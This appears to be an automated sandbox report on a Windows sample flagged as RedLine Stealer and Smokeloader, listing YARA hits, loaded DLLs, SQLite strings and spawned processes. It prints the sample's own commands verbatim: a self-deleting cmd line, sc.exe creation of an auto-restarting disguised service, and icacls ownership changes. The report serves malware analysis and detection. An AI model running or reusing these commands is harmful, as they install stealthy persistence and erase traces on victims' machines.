Source: file.exe, 00000000.00000002.2788685435.000000006CA65000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.2762173907.000000000249D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/76@2/35

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C847030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C847030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,

0_2_00411400

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

0_2_00410900

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620942029 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

23_2_00007FF620942029

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF620941DBC

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF620941DBC

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5012
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess1524
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03

Source: C:\ProgramData\BFCAAEHJDB.exe

File created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340604993.000000001B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2361745626.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"
Source: unknown	Process created: C:\ProgramData\BFCAAEHJDB.exe C:\ProgramData\BFCAAEHJDB.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212
Source: C:\ProgramData\BFCAAEHJDB.exe	Process created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe C:\ProgramData\BFCAAEHJDB.exe	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
